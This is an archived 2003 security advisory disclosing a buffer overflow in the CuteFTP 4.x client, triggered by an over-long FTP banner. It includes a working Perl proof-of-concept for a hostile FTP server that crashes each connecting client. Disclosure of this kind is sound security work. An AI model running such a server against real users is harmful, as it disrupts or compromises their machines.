#####################################################*
# Damage Hacking Group security advisory
# www.dhgroup.org
#####################################################*
#Product: CuteFTP client
#Authors: GlobalSCAPE Inc. [www.globalscape.com]
#Vulnerable versions: v.4.*
#Vulnerability: buffer overflow
#####################################################*
#Overview#--------------------------------------------------------------#
"CuteFTP is a Windows based File Transfer Protocol (FTP) client that
allows users to utilize the capabilities of FTP without having to
know all the details of the protocol itself. CuteFTP simplifies FTP
by offering a user-friendly Windows interface instead of a cumbersome
command line utility. CuteFTP gives novice PC users the ability to
upload, download and edit files on remote FTP servers around the world."
#Problem#---------------------------------------------------------------#
It's possible to crash CuteFTP (and run shellcode(?)) by sending
long (>2048b) ftp-banner to it. As u understand, this problem could
be used by FTP server.
#Fix#--------------------------------------------------------------------#
Download new verion from www.globalscape.com.
#Exploit#----------------------------------------------------------------#
#!/usr/bin/perl
######################################################
#Here is an example of ftp-server. It will freeze each
#CuteFTP-user, that try to connect to it.
#######################################################
use IO::Socket;
$port = "21";
$data = "a";
$num = "2049";
$buf .= $data x $num;
$server = IO::Socket::INET->new(LocalPort => $port, Type => SOCK_STREAM, Reuse => 1, Listen => 2)
or die "Couldn't create tcp-server.\n";
while ($client = $server->accept()) {
print "Client connected.\n";
print "Attacking...";
print $client "$buf";
print "OK\n";
close($client);
}
#EOF
Best regards www.dhgroup.org
D4rkGr3y icq 540981
This archive was generated by hypermail 2b30 : Sat Jan 04 2003 - 18:37:02 PST